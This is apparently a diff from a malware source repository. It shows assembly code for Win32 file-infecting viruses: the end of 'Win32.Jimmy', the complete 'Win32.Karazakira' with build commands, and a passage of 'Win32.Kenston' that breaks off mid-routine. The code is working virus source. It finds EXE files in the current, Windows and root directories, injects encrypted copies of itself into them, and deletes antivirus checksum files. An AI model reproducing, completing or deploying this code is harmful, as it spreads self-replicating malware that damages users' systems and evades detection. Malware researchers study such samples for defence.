mov word ptr [ecx], bx
add ecx, 2
dec edx
jnz encgoloop
encgo:
jmp KernelSearchStart
NoKernel:
mov ebx, dword ptr [ebp+OldEIP]
mov dword ptr [ebp+retEIP], ebx
mov edi, dword ptr [ebp+alte]
mov dword ptr [ebp+retBase], edi
mov dword ptr [ebp+Trash2], edi
mov edi, dword ptr [ebp+alte]
mov dword ptr [ebp+retBase], edi
ExecuteHost:
cmp ebp, 0
je FirstGenHost
mov ebx,12345678h
org $-4
retEIP dd 0h
add ebx,12345678h
org $-4
retBase dd 0h
push ebx
ret
FirstGenHost:
sub ebx, ebx
push ebx
call ExitProcess
InfectEXE:
call GetRand
mov ebx, dword ptr [ebp+RandVal]
mov word ptr [ebp+codeofcrypt], bx
mov ecx, -49695d
add ecx, 49695d
add ecx, dword ptr [ebp+MapAddress]
mov eax, [ecx+3Ch]
add eax, ecx
add eax, 3Ch
mov edx, [eax]
sub eax, 3Ch
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
mov dword ptr [ebp+AlignReg2], -1
and dword ptr [ebp+AlignReg2], edx
sbb eax, 2d
add ecx, groese
mov dword ptr [ebp+AlignReg1], 0
xor dword ptr [ebp+AlignReg1], ecx
call Align
and ecx, 0
add ecx, dword ptr [ebp+AlignReg1]
mov dword ptr [ebp+NewSize], ecx
pushad
Call UnMapFile2
popad
mov dword ptr [ebp+WFD_nFileSizeLow], ecx
call CreateMap
jc NoEXE
push dword ptr [ebp+MapAddress]
pop esi
mov edx, dword ptr [esi+3Ch]
add edx, esi
push edx
pop esi
mov ebx,0
mov bx, word ptr [esi+06h]
mov ecx, 1d
sub ebx, ecx
imul ebx, ebx, 28h
add edx, 120d
add edx, ebx
mov eax, dword ptr [esi+74h]
shl eax, 3
add edx, eax
mov eax, dword ptr [esi+28h]
mov dword ptr [ebp+OldEIP], eax
mov ecx, dword ptr [esi+34h]
push ecx
pop dword ptr [ebp+alte]
push 0
pop ecx
add ecx, [edx+10h]
push ecx
pop ebx
add edx, 14h
add ecx, [edx]
sub edx, 14h
push ecx
push ebx
pop eax
add eax, [edx+0Ch]
mov [esi+28h], eax
mov dword ptr [ebp+NewEIP], eax
sub eax, eax
add eax, [edx+10h]
push eax
add eax, groese
push eax
pop dword ptr [ebp+AlignReg1]
push dword ptr [esi+3Ch]
pop dword ptr [ebp+AlignReg2]
call Align
sub eax, eax
add eax, dword ptr [ebp+AlignReg1]
mov dword ptr [edx+10h], 0h
add dword ptr [edx+10h], eax
pop eax
add eax, groese
mov dword ptr [edx+08h], 0
add dword ptr [edx+08h], eax
mov eax, dword ptr [edx+0Ch]
add eax, dword ptr [edx+10h]
mov dword ptr [esi+50h], 0h
add dword ptr [esi+50h], eax
or dword ptr [edx+24h], 0A0000020h
mov dword ptr [esi+4Ch], 'Jimm'
pop edi
add edi, dword ptr [ebp+MapAddress]
mov ecx, ( offset encgo - offset Virus )
lea esi, [ebp+Virus]
AppendLoop:
rep movsb
push encrypted
pop ecx
CryptAppendLoop:
lodsw
xor ax, word ptr [ebp+codeofcrypt]
stosw
sub ecx, 1
jnz CryptAppendLoop
mov edx, ( -1d xor 27d )
xor edx, 27d
and edx, dword ptr [ebp+InfCounter]
sub edx, 1d
rol eax, 16d
push edx
pop dword ptr [ebp+InfCounter]
clc
ret
NoEXE:
stc
ret
InfectFile:
cmp dword ptr [ebp+WFD_nFileSizeLow], 44000d
jbe NoInfection
cmp dword ptr [ebp+WFD_nFileSizeHigh], 0
jne NoInfection
call OpenFile
jc NoInfection
mov eax, dword ptr [ebp+MapAddress]
cmp word ptr [eax], 'ZM'
je Goodfile
push 28785d
pop ecx
cmp ecx, 28785d
je Notagoodfile
Goodfile:
cmp word ptr [eax+3Ch], 0h
jne _Notagoodfile
jmp Notagoodfile
_Notagoodfile:
xor ebx, ebx
add ebx, [eax+3Ch]
cmp dword ptr [ebp+WFD_nFileSizeLow],ebx
jb Notagoodfile
add ebx, eax
cmp word ptr [ebx], 'EP'
je Goodfile2
push 24945d
pop ecx
cmp ecx, 24945d
je Notagoodfile
Goodfile2:
cmp dword ptr [ebx+4Ch], 'Jimm'
jz Notagoodfile
mov cx, word ptr [ebx+16h]
rcl edx, 12d
and cx, 0F000h
cmp cx, 02000h
je Notagoodfile
mov cx, word ptr [ebx+16h]
and cx, 00002h
cmp cx, 00002h
jne Notagoodfile
call InfectEXE
jc NoInfection
and edx, ebx
Notagoodfile:
call UnMapFile
NoInfection:
ret
Outbreak:
mov esi, dword ptr [ebp+OldEIP]
mov dword ptr [ebp+retEIP], esi
mov ebx, dword ptr [ebp+alte]
mov dword ptr [ebp+retBase], ebx
call InfectCurDir
mov eax, ebp
add eax, offset OldDirectory
push eax
mov eax, ( 255d xor 32d )
xor eax, 32d
push eax
call dword ptr [ebp+XGetCurrentDirectoryA]
lea edx, [ebp+OldDirectory]
mov ebx, edx
TravelDownLoop1:
inc edx
cmp byte ptr [edx], 0
jne TravelDownLoop1
TravelDownLoop2:
add edx, -1d
cmp byte ptr [edx], '\'
jne TravelDownNext
mov byte ptr [edx], 0
push ebx
call dword ptr [ebp+XSetCurrentDirectoryA]
pushad
call InfectCurDir
popad
mov byte ptr [edx], '\'
TravelDownNext:
cmp edx, ebx
jne TravelDownLoop2
mov eax, ( 255d + 16d )
sub eax, 16d
push eax
lea ecx, [ebp+DirectoryBuffer]
push ecx
call dword ptr [ebp+XGetWindowsDirectoryA]
xchg ecx, edx
push edx
call dword ptr [ebp+XSetCurrentDirectoryA]
call InfectCurDir
lea edx, [ebp+OldDirectory]
push edx
call dword ptr [ebp+XSetCurrentDirectoryA]
jmp ExecuteHost
GetApis:
push NumberOfApis
pop eax
mov esi, 37168d
sub esi, 37168d
add esi, dword ptr [ebp+KernelPE]
mov edi, [esi+78h]
add edi, [ebp+KernelMZ]
add edi, 28d
mov esi, dword ptr [edi]
add esi, [ebp+KernelMZ]
mov dword ptr [ebp+ATableVA], esi
inc edi
add edi, 3d
mov esi, dword ptr [edi]
add edi, 4d
add esi, [ebp+KernelMZ]
mov dword ptr [ebp+NTableVA], esi
mov esi, dword ptr [edi]
add esi, [ebp+KernelMZ]
mov dword ptr [ebp+OTableVA], esi
lea ecx, [ebp+APINames]
mov esi, ebp
add esi, offset APIOffsets
GetApisLoop:
and word ptr [ebp+counter], 0h
inc ecx
add ecx, 3d
xor edx, edx
add edx, dword ptr [ebp+TempAPI]
mov dword ptr [esi], edx
inc esi
add esi, 3d
dec eax
jnz GetApisLoop
jmp Outbreak
CRC32:
pushad
mov edi, -28264d
add edi, 28264d
add edi, esi
push 0
pop ebx
add ebx, edi
LenCRC:
sub ebx, -1d
cmp byte ptr [ebx], 0
jne LenCRC
sub ebx, edi
mov esi, ebx
add esi, 1d
cld
mov eax, 16859d
sub eax, 16859d
dec eax
sub eax, 0d
mov edx, eax
NextByteCRC:
mov ebx, -6128d
add ebx, 6128d
sub ecx, ecx
mov bl, byte ptr [edi]
inc edi
xor bl, al
mov al, ah
mov ah, dl
mov dl, dh
mov dh, 8
NextBitCRC:
shr cx, 1
rcr bx, 1
jnc NoCRC
xor bx,08320h
xor cx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor eax, ebx
xor edx, ecx
dec esi
jnz NextByteCRC
not edx
not eax
mov ebx, edx
rol ebx, 16d
mov bx, ax
mov dword ptr [ebp+APICRC32], ebx
popad
ret
SearchAPI1:
pushad
push 0
pop ebx
add ebx, dword ptr [ebp+NTableVA]
and dword ptr [ebp+Trash1], ebx
sar edx, 10d
SearchNextApi1:
push ebx
mov eax, dword ptr [ebx]
add eax, [ebp+KernelMZ]
push eax
pop ebx
push ebx
pop esi
push esi
pop dword ptr [ebp+TempApisearch2]
push ecx
cld
call CRC32
mov eax, 52825d
sub eax, 52825d
add eax, dword ptr [ebp+APICRC32]
sub eax, dword ptr [ecx]
cmp eax, 0
je FoundApi1
ApiNotFound:
pop ecx
mov esi,0
add esi, dword ptr [ebp+TempApisearch2]
pop ebx
inc ebx
add ebx, 3d
add word ptr [ebp+counter], 1h
cmp word ptr [ebp+counter], 2002h
je NotFoundApi1
jmp SearchNextApi1
FoundApi1:
add esp, 8d
xor edx, edx
mov dx, word ptr [ebp+counter]
clc
rcl edx, 1
add edx, dword ptr [ebp+OTableVA]
push edx
pop ebx
movzx edx, word ptr [ebx]
clc
rcl edx, 2h
add edx, dword ptr [ebp+ATableVA]
mov ebx, dword ptr [ebp+KernelMZ]
add ebx, dword ptr [edx]
mov dword ptr [ebp+TempAPI], -1
and dword ptr [ebp+TempAPI], ebx
cmp byte ptr [ebx], 0cch
je ExecuteHost
popad
ret
NotFoundApi1:
pop esi
popad
jmp ExecuteHost
FindNextFileProc:
call ClearOldData
mov edx, ebp
add edx, offset WIN32_FIND_DATA
push edx
mov ebx, dword ptr [ebp+FindHandle]
push ebx
call dword ptr [ebp+XFindNextFileA]
ret
ClearOldData:
pushad
push 276d
pop eax
lea edx, [ebp+WFD_szFileName]
ClearOldData2:
mov byte ptr [edx], 0h
dec eax
jnz ClearOldData2
popad
ret
FindFirstFileProc:
call ClearOldData
lea edx, [ebp+WIN32_FIND_DATA]
push edx
push ebx
call dword ptr [ebp+XFindFirstFileA]
push eax
pop dword ptr [ebp+FindHandle]
ret
Align:
pushad
mov edx,0
mov eax, dword ptr [ebp+AlignReg1]
mov ecx, dword ptr [ebp+AlignReg2]
div ecx
inc eax
mul ecx
mov dword ptr [ebp+AlignReg1], 0h
add dword ptr [ebp+AlignReg1], eax
popad
ret
db 'Win32.Jimmy - SST@Hablas.com',0
OpenFile:
push 0
push 0
push 3
push 0
push 1
mov ebx, 80000000h or 40000000h
push ebx
lea ebx, WFD_szFileName
add ebx, ebp
push ebx
sal ecx, 28d
call dword ptr [ebp+XCreateFileA]
add eax, 1
jz Closed
dec eax
mov dword ptr [ebp+FileHandle], eax
CreateMap:
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
push ecx
and edx, 0
push edx
add ebx, eax
push ecx
push edx
push 00000004h
push edx
push dword ptr [ebp+FileHandle]
call dword ptr [ebp+XCreateFileMappingA]
mov dword ptr [ebp+MapHandle], -1
and dword ptr [ebp+MapHandle], eax
pop ecx
or eax, eax
jz CloseFile
push 0
pop edx
push ecx
push edx
push edx
push 2h
push dword ptr [ebp+MapHandle]
call dword ptr [ebp+XMapViewOfFile]
test eax, eax
jz UnMapFile
mov dword ptr [ebp+MapAddress], -1
and dword ptr [ebp+MapAddress], eax
clc
ret
UnMapFile:
Call UnMapFile2
CloseFile:
push dword ptr [ebp+FileHandle]
Call [ebp+XCloseHandle]
Closed:
stc
ret
UnMapFile2:
push dword ptr [ebp+MapAddress]
call dword ptr [ebp+XUnmapViewOfFile]
push dword ptr [ebp+MapHandle]
call dword ptr [ebp+XCloseHandle]
ret
InfectCurDir:
mov [ebp+InfCounter], 2d
mov ebx, offset filemask
add ebx, ebp
call FindFirstFileProc
inc eax
jz EndInfectCurDir
InfectCurDirFile:
call InfectFile
sub ecx, ecx
add ecx, dword ptr [ebp+InfCounter]
inc ecx
dec ecx
jz EndInfectCurDir
call FindNextFileProc
cmp eax, 0h
jne InfectCurDirFile
EndInfectCurDir:
push dword ptr [ebp+FindHandle]
call dword ptr [ebp+XFindClose]
ret
KernelSearchStart:
mov eax, dword ptr [esp]
shr eax, 16d
rol eax, 16d
mov dword ptr [ebp+K32Trys], 4h
GK1:
mov edx, -1d
and edx, dword ptr [ebp+K32Trys]
or edx, edx
jz NoKernel
cmp word ptr [eax], 'ZM'
je CheckPE
GK2:
mov ebx, ( 65536d + 32d )
sub ebx, 32d
sub eax, ebx
dec dword ptr [ebp+K32Trys]
jmp GK1
CheckPE:
mov edx, [eax+3Ch]
xchg edx, eax
add eax, edx
xchg edx, eax
movzx ebx, word ptr [edx]
sub ebx, 'EP'
jz CheckDLL
jmp GK2
CheckDLL:
KernelFound:
mov dword ptr [ebp+KernelMZ], -1
not ecx
and dword ptr [ebp+KernelMZ], eax
mov dword ptr [ebp+KernelPE], edx
lea eax, [ebp+offset GetApis]
push eax
ret
GetRand:
pushad
add edx, dword ptr [ebp+RandVal]
call dword ptr [ebp+XGetTickCount]
add edx, eax
mov dword ptr [ebp+RandVal], 0
add dword ptr [ebp+RandVal], edx
popad
ret
endofcrypt:
EndVirus:
end VirusCode
Win32/Infector/Win32.JollyRoger.a.7z
BIN
View File
Binary file not shown.
Win32/Infector/Win32.JollyRoger.b.7z
BIN
View File
Binary file not shown.
Win32/Infector/Win32.JunkMail.7z
BIN
View File
Binary file not shown.
Win32/Infector/Win32.Junkhtmail.asm
+3381
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.KaZaM.asm
+1695
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Karazakira.asm
+567
View File
@@ -0,0 +1,567 @@
; _ __ ____ __ ___ __ _ _ ____ __
; | |/\ / \ | _ \ / \ / _ \ / \ | |/\ | | | _ \ / \
; | _/ | || | | / | || | |// / | || | | _/ | | | / | || |
; | \ | | | |\ \ | | / /|\ | | | \ | | | |\ \ | |
; |_|\/ |_||_| |_||_| |_||_| /____/ |_||_| |_|\/ |_| |_||_| |_||_|
; By Psychologic/rRlf
;
; Kara-Intro :
;
; This is my 3rd win32asm virus, I named it as an Indian's ring "KARAZAKIRA"
; which belived can call a soul from the deathman (a man who has been die)
; well, I think this is unique name.
; Workz :
;
; When Karazakira file executed, Karazakira searches for 4 PE *.EXE files in the current
; and windows directory. Those files will be infected by adding a new section called
; ".Karazakira" (called in infect section as ptr [edi], "raK.").
; File modification works by direct access, not by memory mapping (Bad idea right..??)
; well it just for different touch, hehe :P
; Feature :
;
; * full Win32 compatible
; * encrypted using DIV algorithm
; * Infecting windows directory
; * Deleting some AV checksum files
; Compile :
;
; tasm32 /mx /m karazakira.asm
; tlink32 /Tpe /aa karazakira.obj,,, import32.lib
; ====================================================================================
; ====================================================================================
;
; ====================================================================================
; ====================================================================================
length_virus_file EQU (end_static - start)
length_virus_mem EQU (end_mem - start)
length_encrypted EQU (end_encrypted - encrypted)
length_PE_header EQU 1000
Extrn MessageBoxA:Proc
Extrn ExitProcess:Proc
.386p
.model flat
.data
start:
pushad
pushfd
db 0BDh
delta_offset dd 0
lea esi, [ebp+offset encrypted]
mov edi, esi
mov ecx, length_encrypted / 8
db 0BBh
crypt_key dd 0
rush_code:
copyright db "Win32.Karazakira By Psychologic", 0
db "On Friday, second January '05 - Depok City, Indonesia", 0
GetProcAddress db "GetProcAddress", 0
l_GPA = $ - offset GetProcAddress
FindFirstFileA db "FindFirstFileA", 0
FindNextFileA db "FindNextFileA", 0
FindClose db "FindClose", 0
CreateFileA db "CreateFileA", 0
CloseHandle db "CloseHandle", 0
ReadFile db "ReadFile", 0
WriteFile db "WriteFile", 0
DeleteFileA db "DeleteFileA", 0
SetFilePointer db "SetFilePointer", 0
SetFileAttributesA db "SetFileAttributesA", 0
SetFileTime db "SetFileTime", 0
SetCurrentDirectoryA db "SetCurrentDirectoryA", 0
GetCurrentDirectoryA db "GetCurrentDirectoryA", 0
GetWindowsDirectoryA db "GetWindowsDirectoryA", 0
GetSystemDirectoryA db "GetSystemDirectoryA", 0
GetTickCount db "GetTickCount", 0
anti_vir_dat db "ANTI-VIR.DAT", 0
chklist_ms db "CHKLIST.MS", 0
chklist_cps db "CHKLIST.CPS", 0
avp_crc db "AVP.CRC", 0
orig_eip dd offset quit_1st_gen
filemask db "*.EXE", 0
new_section_header:
db ".Karazakira", 0, 0
VirtualSize dd length_virus_mem
VirtualAddress dd 0
PhysicalSize dd length_virus_file
PhysicalAddress dd 0
dd 0, 0, 0
dd 0E0000020h
if ((($-encrypted) mod 8) NE 0)
db (8-(($-encrypted) mod 8)) dup(0)
endif
decrypt:
lodsd
xchg eax, edx
lodsd
cmp edx, ebx
JA no_mul
push ebx
push edx
mul ebx
pop ebx
add eax, ebx
adc edx, 0
pop ebx
stosd
xchg eax, edx
stosd
LOOP decrypt
JMP encrypted
no_mul:
stosd
xchg eax, edx
stosd
LOOP decrypt
encrypted:
mov eax, [ebp+offset orig_eip]
mov [ebp+offset host_entry], eax
push offset seh_handler
push dword ptr fs:[0]
mov fs:[0], esp
mov eax, [esp+11*4]
scan_kernel:
cmp word ptr [eax], "ZM"
JNE kernel_not_found
mov ebx, [eax+3Ch]
add ebx, eax
cmp dword ptr [ebx], "EP"
JE kernel32_found
kernel_not_found:
dec eax
JMP scan_kernel
kernel32_found:
mov [ebp+offset kernel32], eax
mov ebx, [ebx+120]
add ebx, eax
mov edx, [ebx+20h]
add edx, eax
mov ecx, [ebx+18h]
GPA_search:
push ecx
mov esi, [edx]
add esi, eax
lea edi, [ebp+offset GetProcAddress]
mov ecx, l_GPA
cld
rep cmpsb
pop ecx
JE GPA_found
inc edx
inc edx
inc edx
inc edx
LOOP GPA_search
GPA_not_found:
JMP return_to_host
GPA_found:
mov edx, [ebx+18h]
sub edx, ecx
shl edx, 1
add edx, [ebx+24h]
add edx, eax
xor ecx, ecx
mov cx, [edx]
shl ecx, 2
add ecx, [ebx+1Ch]
add ecx, eax
mov ebx, [ecx]
add ebx, eax
mov [ebp+offset GPA_addr], ebx
lea eax, [ebp+offset curdir]
push eax
push 260
lea eax, [ebp+offset GetCurrentDirectoryA]
call call_API
push 260
lea eax, [ebp+offset windir]
push eax
lea eax, [ebp+offset GetWindowsDirectoryA]
call call_API
lea eax, [ebp+offset windir]
push eax
lea eax, [ebp+offset SetCurrentDirectoryA]
call call_API
call infect_dir
lea eax, [ebp+offset curdir]
push eax
lea eax, [ebp+offset SetCurrentDirectoryA]
call call_API
call infect_dir
return_to_host:
pop dword ptr fs:[0]
pop eax
popfd
popad
db 068h
host_entry dd 0
ret
seh_handler:
mov esp, [esp+8]
JMP return_to_host
infect_dir:
mov dword ptr [ebp+infectioncount], 4
lea eax, [ebp+offset anti_vir_dat]
call kill_file
lea eax, [ebp+offset chklist_ms]
call kill_file
lea eax, [ebp+offset chklist_cps]
call kill_file
lea eax, [ebp+offset avp_crc]
call kill_file
lea eax, [ebp+offset find_data]
push eax
lea eax, [ebp+offset filemask]
push eax
lea eax, [ebp+offset FindFirstFileA]
call call_API
mov [ebp+offset search_handle], eax
inc eax
JZ end_infect_dir
infect:
push 80h
lea eax, [ebp+offset FileName]
push eax
lea eax, [ebp+offset SetFileAttributesA]
call call_API
push 0
push 80h
push 3
push 0
push 0
push 0C0000000h
lea eax, [ebp+offset FileName]
push eax
lea eax, [ebp+offset CreateFileA]
call call_API
mov [ebp+offset file_handle], eax
inc eax
JZ restore_attributes
push 0
lea eax, [ebp+offset bytes_read]
push eax
push 64
lea eax, [ebp+offset dos_header]
push eax
push [ebp+file_handle]
lea eax, [ebp+offset ReadFile]
call call_API
cmp word ptr [ebp+offset exe_marker], "ZM"
JNE close
push 0
push 0
push dword ptr [ebp+offset new_header]
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
push 0
lea eax, [ebp+offset bytes_read]
push eax
push length_pe_header
lea eax, [ebp+offset pe_header]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset ReadFile]
call call_API
cmp dword ptr [ebp+offset pe_marker], "EP"
JNE close
test word ptr [ebp+offset flags], 0010000000000000b
JNZ close
lea ebx, [ebp+offset optional_header]
add bx, word ptr [ebp+offset SizeOfOptHeader]
xor eax, eax
mov ax, word ptr [ebp+offset NumberOfSections]
dec eax
mov ecx, 40
mul ecx
add eax, ebx
mov edi, eax
cmp dword ptr [edi], "raK."
JE close
mov eax, [ebp+offset EntryPoint]
add eax, [ebp+offset ImageBase]
mov [ebp+offset orig_eip], eax
inc word ptr [ebp+offset NumberOfSections]
mov eax, [edi+12]
add eax, [edi+8]
mov ebx, [ebp+offset SectionAlign]
call align_EAX
mov [ebp+offset VirtualAddress], eax
mov [ebp+offset EntryPoint], eax
add eax, [ebp+offset ImageBase]
sub eax, offset start
mov [ebp+offset delta_offset], eax
mov eax, length_virus_mem
call align_EAX
add dword ptr [ebp+offset SizeOfImage], EAX
mov eax, [edi+20]
add eax, [edi+16]
mov ebx, [ebp+offset FileAlign]
call align_EAX
mov [ebp+offset PhysicalAddress], eax
push 0
push 0
push eax
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
mov eax, length_virus_file
call align_EAX
mov [ebp+PhysicalSize], eax
mov ecx, 40
lea esi, [ebp+offset new_section_header]
add edi, ecx
cld
pusha
xor eax, eax
repe scasb
popa
JNE close
rep movsb
push eax
lea eax, [ebp+offset GetTickCount]
call call_API
mov ebx, eax
ror eax, 8
xor ebx, eax
mov [ebp+offset crypt_key], ebx
lea esi, [ebp+offset start]
lea edi, [ebp+offset crypt_buffer]
mov ecx, length_virus_file
rep movsb
lea esi, [ebp+offset crypt_buffer+(encrypted-start)]
mov edi, esi
mov cx, length_encrypted / 8
encrypt:
lodsd
xchg eax, edx
lodsd
xchg eax, edx
cmp edx, ebx
JA no_div
div ebx
no_div:
xchg eax, edx
stosd
xchg eax, edx
stosd
loop encrypt
pop eax
push 0
lea ecx, [ebp+offset bytes_read]
push ecx
push eax
lea eax, [ebp+offset crypt_buffer]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset WriteFile]
call call_API
push 0
push 0
push dword ptr [ebp+offset new_header]
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
push 0
lea eax, [ebp+offset bytes_read]
push eax
push length_pe_header
lea eax, [ebp+offset pe_header]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset WriteFile]
call call_API
dec dword ptr [ebp+infectioncount]
close:
lea eax, [ebp+offset LastWriteTime]
push eax
lea eax, [ebp+offset LastAccessTime]
push eax
lea eax, [ebp+offset CreationTime]
push eax
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFileTime]
call call_API
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset CloseHandle]
call call_API
restore_attributes:
push dword ptr [ebp+offset FileAttributes]
lea eax, [ebp+offset FileName]
push eax
lea eax, [ebp+offset SetFileAttributesA]
call call_API
find_next:
mov ecx, [ebp+infectioncount]
JCXZ close_find
lea eax, [ebp+offset find_data]
push eax
push dword ptr [ebp+offset search_handle]
lea eax, [ebp+offset FindNextFileA]
call call_API
dec eax
JZ infect
close_find:
push dword ptr [ebp+offset search_handle]
lea eax, [ebp+offset FindClose]
call call_API
end_infect_dir:
ret
kill_file:
push eax
push 80h
push eax
lea eax, [ebp+offset SetFileAttributesA]
call call_API
lea eax, [ebp+offset DeleteFileA]
call call_API
RET
call_API:
push eax
push dword ptr [ebp+offset kernel32]
call [ebp+offset GPA_addr]
JMP eax
align_EAX:
xor edx, edx
div ebx
or edx, edx
JZ no_round_up
inc eax
no_round_up:
mul ebx
RET
end_encrypted:
end_static:
heap:
crypt_buffer db length_virus_file dup(?)
padding db 1024 dup(?)
windir db 260 dup(?)
curdir db 260 dup(?)
kernel32 dd ?
GPA_addr dd ?
search_handle dd ?
file_handle dd ?
bytes_read dd ?
infectioncount dd ?
find_data:
FileAttributes dd ?
CreationTime dq ?
LastAccessTime dq ?
LastWriteTime dq ?
FileSize dq ?
wfd_reserved dq ?
FileName db 260 dup(?)
DosFileName db 14 dup(?)
dos_header:
exe_marker dw ?
dosheader_shit db 58 dup(?)
new_header dd ?
pe_header:
pe_marker dd ?
machine dw ?
NumberOfSections dw ?
TimeDateStamp dd ?
DebugShit dq ?
SizeOfOptHeader dw ?
flags dw ?
optional_header:
optional_magic dw ?
linkerversion dw ?
SizeOfCode dd ?
SizeOfDATA dd ?
SizeOfBSS dd ?
EntryPoint dd ?
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
SectionAlign dd ?
FileAlign dd ?
OSVersion dd ?
OurVersion dd ?
SubVersion dd ?
reserved1 dd ?
SizeOfImage dd ?
SizeOfHeader dd ?
Checksum dd ?
org offset pe_header+length_pe_header
end_mem:
.code
start_1st_gen:
pushad
pushfd
xor ebp, ebp
JMP encrypted
quit_1st_gen:
push 0
push offset caption
push offset message
push 0
call MessageBoxA
push 0
call ExitProcess
caption:
db "Win32.Karazakira by Psychologic"
db 0
message db "Freee palestine...freee palestine", 0
end start_1st_gen
Win32/Infector/Win32.Kenston.asm
+772
View File
@@ -0,0 +1,772 @@
Win32.Kenston
.386
locals
jumps
.model flat, STDCALL
extrn ExitProcess : PROC
org 1000h
.data
db "This is a virus.",0
.code
progstart:
push 0
call ExitProcess
STARTVIRUS:
call relativity
relativity:
pop ebp
cld
mov eax, ebp
db 2dh ;sub eax,
SaveEntry dd (offset relativity- offset progstart)
push eax
sub ebp, offset relativity
mov ecx, dword ptr [esp + 4]
and ecx, 0FFF00000h
mov ebx, 0BFF70000h ;Base address of win95's kernel
cmp ecx, 0BFF00000h ;are we win95 or 98?
je vulnerable
mov ebx, 077f00000h
cmp ecx, ebx ;are we NT?
jne exit
vulnerable:
mov ecx, ebx
mov edx, ecx ;Put imagebase in edx
mov dword ptr [ebp + imagebase], ecx ;Save the imagebase
xor eax, eax ;Clear eax
mov ax, word ptr [edx + 3Ch] ;Get relocation in MZ header
add ecx, eax ;Make ecx start of PE header
cmp word ptr [ecx], 'EP' ;Is everything working right?
jne exit
mov eax, dword ptr [ecx + 120] ;Get RVA of export table
add eax, edx ;Add on the Imagebase
mov dword ptr [ebp + offset ExportTable], eax ;Save the exporttable's address
mov ecx, dword ptr [eax + 24] ;Get number of entry's
dec ecx ;Drop number by one so bottom loop works
mov dword ptr [ebp + offset NumExports], ecx ;Store number of entrys
mov ecx, dword ptr [eax + 28] ;Get RVA of the Address Table
add ecx, edx ;Bias it by the Image Base
mov dword ptr [ebp + offset AddressTable], ecx ;Save the address
mov ecx, dword ptr [eax + 36] ;Get RVA of the Ordinal Table
add ecx, edx ;Bias it by the Image Base
mov dword ptr [ebp + offset OrdinalTable], ecx ;Save the address
mov ecx, dword ptr [eax + 32] ;Get RVA of the Name Table
add ecx, edx ;Bias it by the Image Base
mov dword ptr [ebp + offset NameTable], ecx ;Save the address
;Upon entry:
; ecx=start of RVA String table
; edx=imagebase
; ebx=start of string of function to resolve
;Returns:
; ebx=Address of function
lea ebx, [ebp + offset LoadLibraryaS] ;Function to scan for
push ecx ;Save start of RVA name table
call resolveexport ;Resolve LoadLibraryA
pop ecx
mov dword ptr [ebp + offset loadlibrarya], ebx ;Save address of loadlibrarya
lea ebx, [ebp + GetProcAddressS] ;Load address of function to resolve
call resolveexport ;Resolve getprocaddress
mov dword ptr [ebp + offset getprocaddress], ebx ;Save getprocaddress
lea esi, [ebp + offset APIList] ;Where function strings are started
lea edi, [ebp + offset FindFile] ;Where to store resolved address's
call maketable
lea ebx, [ebp + offset DirSave]
push ebx
push 256
mov ebx, [ebp + offset GetCurrentDir]
call ebx
cmp eax, 00h
je exit ;If not successfull then quit
lea ebx, [ebp + offset Root] ;Go to the root directory
push ebx
mov ebx, dword ptr [ebp + offset SetCurrentDir]
call ebx
cmp eax, 01 ;Were we sucessfull?
jne exit ;If not then exit
call InfectFirstDirectory
lea ebx, [ebp + offset DirSave] ;Go to the original directory
push ebx
mov ebx, dword ptr [ebp + offset SetCurrentDir]
call ebx
exit:
pop eax ;Return to host
jmp eax
InfectFirstDirectory:
lea ebx, [ebp + offset win32_file_data]
push ebx
lea ebx, [ebp + offset DirWildCard]
push ebx
mov ebx, dword ptr [ebp + offset FindFile]
call ebx
cmp eax, -1
je DoneDirScanning
mov dword ptr [ebp + offset DirSearchHandle], eax ;Save our search handle
cmp dword ptr [ebp + offset fileattr], 10h
jne NotADir1
cmp byte ptr [ebp + offset Fullname], '.'
je InfectNextDirectory
call TryInfectingDir ;Try infecting the possible directory
NotADir1:
InfectNextDirectory:
lea ebx, [ebp + offset win32_file_data] ;Where to store fileinfo
push ebx
push dword ptr [ebp + offset DirSearchHandle]
mov ebx, dword ptr [ebp + offset FindNext]
call ebx ;Find next file
cmp eax, 01
jne DoneDirScanningNoneFound
cmp dword ptr [ebp + offset fileattr], 10h
jne NotADir2
cmp byte ptr [ebp + offset Fullname], '.'
je NotADir2
call TryInfectingDir
NotADir2:
jmp InfectNextDirectory
DoneDirScanning:
push dword ptr [ebp + offset DirSearchHandle] ;Close the search handle
mov eax, [ebp + offset FindClose]
call eax
DoneDirScanningNoneFound:
ret
TryInfectingDir:
lea ebx, [ebp + offset FullName] ;Go to the dir we found
push ebx
mov ebx, dword ptr [ebp + offset SetCurrentDir]
call ebx
cmp eax, 01 ;Was it really a directory?
jne NotaDirectory ;If not dont infect it or drop out of it
call FindFirstFile
push dword ptr [ebp + offset DirSearchHandle]
call InfectFirstDirectory
pop dword ptr [ebp+ offset DirSearchHandle]
lea ebx, [ebp + offset DotDot] ;We are going to the previous dir
push ebx
mov ebx, dword ptr [ebp + offset SetCurrentDir]
call ebx
NotaDirectory:
ret
FindFirstFile:
lea ebx, [ebp + offset win32_file_data] ;Where file info goes
push ebx
lea ebx, [ebp + offset EXEWildcard] ;What to search for
push ebx
mov ebx, dword ptr [ebp + offset FindFile] ;Find first file
call ebx
cmp eax, -1 ;Error?
je ExitScanning
mov dword ptr [ebp + offset SearchHandle], eax ;Save search handle
jmp check_file
FindNextFile:
lea ebx, [ebp + offset win32_file_data] ;Where to store fileinfo
push ebx
push dword ptr [ebp + offset SearchHandle] ;Saved search handle
mov ebx, dword ptr [ebp + offset FindNext]
call ebx ;Find next file
cmp eax, 01
jne DoneScanning
check_file:
push 0
push 20h
push 3 ;Open existing file
push 0
push 0
push 80000000h + 40000000h ;Open for reading and writing
lea ebx, [ebp + offset fullname]
push ebx
mov ebx, dword ptr [ebp + offset Createfile]
call ebx
cmp eax, -1 ;Was there any error?
je FindNextFile
